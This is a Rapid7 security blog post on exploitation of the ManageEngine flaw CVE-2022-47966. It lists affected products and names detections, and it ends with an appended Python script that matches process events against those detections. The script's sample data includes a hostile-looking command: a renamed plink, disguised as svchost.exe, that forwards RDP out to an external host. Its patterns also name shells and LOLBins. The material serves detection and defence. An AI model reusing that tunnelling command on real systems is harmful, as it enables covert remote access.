CVE-2022-47966: Rapid7 Observed Exploitation of Critical ManageEngine Vulnerability

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2023/01/19/etr-cve-2022-47966-rapid7-observed-exploitation-of-critical-manageengine-vulnerability/


Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.

Rapid7 is responding to various compromises arising from the exploitation of CVE-2022-47966, a pre-authentication remote code execution (RCE) vulnerability impacting at least 24 on-premise ManageEngine products. CVE-2022-47966 stems from a vulnerable third-party dependency on Apache Santuario.
Several of the affected products are extremely popular with organizations and attackers, including ADSelfService Plus and ServiceDesk Plus. Patches were released in October and November of 2022; the exact timing of fixed version releases varies by product.

Organizations using any of the affected products listed in ManageEngine’s advisory should update immediately and review unpatched systems for signs of compromise, as exploit code is publicly available and exploitation has already begun.

Affected products

See ManageEngine’s advisory for CVE-2022-47966 for updated product and version information.

At the time of publication, Zoho’s advisory qualifies the affected products with the caveats marked below:
* Vulnerable if SAML-based SSO is configured and currently active.
** Vulnerable if SAML-based SSO has been configured at least once in the past, regardless of whether it is currently active.

  • Access Manager Plus*
  • Active Directory 360**
  • ADAudit Plus**
  • ADManager Plus**
  • ADSelfService Plus**
  • Analytics Plus*
  • Application Control Plus*
  • Asset Explorer**
  • Browser Security Plus*
  • Device Control Plus*
  • Endpoint Central*
  • Endpoint Central MSP*
  • Endpoint DLP*
  • Key Manager Plus*
  • OS Deployer*
  • PAM 360*
  • Password Manager Pro*
  • Patch Manager Plus*
  • Remote Access Plus*
  • Remote Monitoring and Management (RMM)*
  • ServiceDesk Plus**
  • ServiceDesk Plus MSP**
  • SupportCenter Plus**
  • Vulnerability Manager Plus*

Background

ManageEngine released patches for these products in October and November of 2022.

Rapid7 observed exploitation across organizations as early as January 18, 2023.

Security firm Horizon3 released technical information with a proof of concept (PoC) on January 19, 2023.

Rapid7 customers

InsightVM & Nexpose customers: Our researchers are currently evaluating the feasibility of adding vulnerability checks for as many of the affected products as possible. We expect coverage for ManageEngine ServiceDesk Plus to be available in the January 19 content release.

InsightIDR & Managed Detection & Response customers: the following pre-existing detections have triggered on observed exploitation:

  • Suspicious Process – Zoho ManageEngine Spawns Child
  • Attacker Technique – Plink Redirecting RDP
  • Attacker Technique – Renamed Plink
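The three detection names above describe behaviour that a defender can reproduce from process-creation telemetry (for example Sysmon Event ID 1 or EDR process events). The script below is an added illustration of that logic, not Rapid7's rule implementation or any ManageEngine code: it runs three simple rules over a handful of constructed process events. The install path, the `ProcEvent` field names, the set of child processes treated as shells, and the sample events are all assumptions chosen for the example.

```python
"""Illustrative detection logic for the three rule names listed above.

Assumptions (not from the original post): events carry parent image path,
image path, command line and the PE version-info OriginalFileName, as Sysmon
Event ID 1 records them. Sample events are constructed for the example.
"""
import ntpath
import re
from dataclasses import dataclass

RULE_SPAWN = "Suspicious Process – Zoho ManageEngine Spawns Child"
RULE_RDP = "Attacker Technique – Plink Redirecting RDP"
RULE_RENAMED = "Attacker Technique – Renamed Plink"

# Interpreters/LOLBins that a ManageEngine Java service should not normally launch.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
          "cscript.exe", "mshta.exe", "rundll32.exe", "certutil.exe"}

# plink remote forward: -R [listen-ip:]listen-port:host:port with RDP as target port.
RDP_FORWARD = re.compile(r"-R\s+(?:\S+:)?\d+:\S+:3389(?:\s|$)", re.IGNORECASE)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str
    original_file_name: str = ""  # PE OriginalFileName, empty if not logged


def _base(path: str) -> str:
    # ntpath handles Windows separators regardless of the host platform.
    return ntpath.basename(path).lower()


def manageengine_spawns_child(ev: ProcEvent) -> bool:
    """Java under a ManageEngine install directory spawning a shell/interpreter."""
    parent = ev.parent_image.lower()
    return ("\\manageengine\\" in parent
            and _base(parent) in {"java.exe", "javaw.exe"}
            and _base(ev.image) in SHELLS)


def renamed_plink(ev: ProcEvent) -> bool:
    """Binary whose version info says plink.exe but whose on-disk name differs."""
    return (ev.original_file_name.lower() == "plink.exe"
            and _base(ev.image) != "plink.exe")


def plink_redirecting_rdp(ev: ProcEvent) -> bool:
    """Any plink (renamed or not) setting up a remote forward to port 3389."""
    is_plink = (_base(ev.image) == "plink.exe"
                or ev.original_file_name.lower() == "plink.exe")
    return is_plink and RDP_FORWARD.search(ev.command_line) is not None


RULES = [
    (RULE_SPAWN, manageengine_spawns_child),
    (RULE_RENAMED, renamed_plink),
    (RULE_RDP, plink_redirecting_rdp),
]


def evaluate(events):
    """Return (rule_name, image) pairs for every rule each event matches."""
    hits = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.append((name, ev.image))
    return hits


# Constructed sample events (not observed data).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\ManageEngine\ServiceDesk\jre\bin\java.exe",
              r"C:\Windows\System32\cmd.exe", "cmd.exe /c hostname"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\cmd.exe", "cmd.exe"),            # benign
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\Temp\svchost.exe",
              "svchost.exe -N -R 3389:127.0.0.1:3389 ops@203.0.113.5",
              original_file_name="Plink.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Tools\plink.exe",
              "plink.exe -ssh admin@10.0.0.5", original_file_name="Plink.exe"),  # benign
]

if __name__ == "__main__":
    for rule_name, image in evaluate(SAMPLE_EVENTS):
        print(f"{rule_name}: {image}")
```

The first event trips the ManageEngine-spawns-child rule, the third event trips both Plink rules, and the two benign events produce nothing. In production telemetry the ManageEngine install path and the Java binary name should be taken from the local deployment rather than hard-coded as here.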